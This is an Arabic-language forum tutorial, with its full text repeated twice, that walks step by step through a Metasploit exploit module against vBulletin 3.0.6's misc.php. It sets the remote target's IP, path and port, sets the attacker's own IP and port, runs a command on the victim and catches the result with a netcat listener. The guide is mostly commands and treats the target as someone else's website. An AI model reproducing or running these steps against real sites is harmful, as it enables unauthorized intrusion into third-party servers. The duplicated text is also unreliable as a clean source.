كيفكم ياجماعه حنشرح برنامج Metasploit Framework لاستثمار الثغرات
زيه زي البيرل لان فيه ثغرات مكتوبه Framework ركزو معايه
اول حاجه حمل البرنامج من هنا
حمل على بركة الله
روح لمكان البرنامج
كود PHP:
C:Program FilesMetasploit Framework
واضغط على ايقونه البرنامج الموضح بالصوره
وبعد ماتضغط على الايقونه البرنامج حاتفتح معك الشاشه
ونضع ملف الثغره في
كود PHP:
C:Program FilesMetasploit Frameworkhomeframeworkexploits
مع ملاحظه كاتكون بمتداد ((( pm )))
طبعا ممكن تفتح الملف وبتلاحظ الاسن بتاع الثغره بالاعلى الاكسبلويت
للتشغيل الثغره اكتب الامر زي ما هو
كود PHP:
use php_vb3_0_6
طيب حنستعرض الخيارات المتاحه لنا للتطبيق بالامر
كود PHP:
show payloads
ظهر لنا الخيارات وحنختار منها cmd_generic بالامر
set PAYLOAD cmd_generic
طيب حنشوف الخيارات اللتي بداخل الخيار بالامر
كود PHP:
show options
حلوجدا,,,,,, نستخدم الخيارات بالترتيب بالاوامر
كود PHP:
set RHOST servers IP
server's IP <<--------------اي بي الموقع المستهدف
كود PHP:
set RPATH /vb/misc.php
vb/misc.php<<-------------مكان الاصابه وهو متغير
وايضا الامر
كود PHP:
set RPORT 80
وبعده الامر
كود PHP:
set LHOST myIP
myIP<<-------------- الاي بي بتاعك
وايضا الامر
كود PHP:
set LPORT 1234
والبورت انت حر ممكن تغسره بس لازم هو نفسه عند الاتصال بالنت كات
والان استخدم اوامر اللينكس بالامر
كود PHP:
set CMD id
والان شوفوا الصوره عند استخدام الاوامر
الان روح وافتح النت كات ونتنصت بيه بالامر
كود PHP:
nc -vv -l -p 1234
لاحظو البورت هو نفسه اللي بالاول وضعناه
واخيرا نستخدم الامر
كود PHP:
exploit
وانتظر,,,,,حتظهر النتيجه بالنت كات
طبعا الشرح كله كافتراضي للتطبيق على احد الثغرات
المهم نفهم طريقة التطبيق لان فيه ثغرات جميله مكتوبه بالــFramework
والسلام عليكم
زيه زي البيرل لان فيه ثغرات مكتوبه Framework ركزو معايه
اول حاجه حمل البرنامج من هنا
حمل على بركة الله
روح لمكان البرنامج
كود PHP:
C:Program FilesMetasploit Framework
واضغط على ايقونه البرنامج الموضح بالصوره
وبعد ماتضغط على الايقونه البرنامج حاتفتح معك الشاشه
ونضع ملف الثغره في
كود PHP:
C:Program FilesMetasploit Frameworkhomeframeworkexploits
مع ملاحظه كاتكون بمتداد ((( pm )))
طبعا ممكن تفتح الملف وبتلاحظ الاسن بتاع الثغره بالاعلى الاكسبلويت
للتشغيل الثغره اكتب الامر زي ما هو
كود PHP:
use php_vb3_0_6
طيب حنستعرض الخيارات المتاحه لنا للتطبيق بالامر
كود PHP:
show payloads
ظهر لنا الخيارات وحنختار منها cmd_generic بالامر
set PAYLOAD cmd_generic
طيب حنشوف الخيارات اللتي بداخل الخيار بالامر
كود PHP:
show options
حلوجدا,,,,,, نستخدم الخيارات بالترتيب بالاوامر
كود PHP:
set RHOST servers IP
server's IP <<--------------اي بي الموقع المستهدف
كود PHP:
set RPATH /vb/misc.php
vb/misc.php<<-------------مكان الاصابه وهو متغير
وايضا الامر
كود PHP:
set RPORT 80
وبعده الامر
كود PHP:
set LHOST myIP
myIP<<-------------- الاي بي بتاعك
وايضا الامر
كود PHP:
set LPORT 1234
والبورت انت حر ممكن تغسره بس لازم هو نفسه عند الاتصال بالنت كات
والان استخدم اوامر اللينكس بالامر
كود PHP:
set CMD id
والان شوفوا الصوره عند استخدام الاوامر
الان روح وافتح النت كات ونتنصت بيه بالامر
كود PHP:
nc -vv -l -p 1234
لاحظو البورت هو نفسه اللي بالاول وضعناه
واخيرا نستخدم الامر
كود PHP:
exploit
وانتظر,,,,,حتظهر النتيجه بالنت كات
طبعا الشرح كله كافتراضي للتطبيق على احد الثغرات
المهم نفهم طريقة التطبيق لان فيه ثغرات جميله مكتوبه بالــFramework
والسلام عليكم
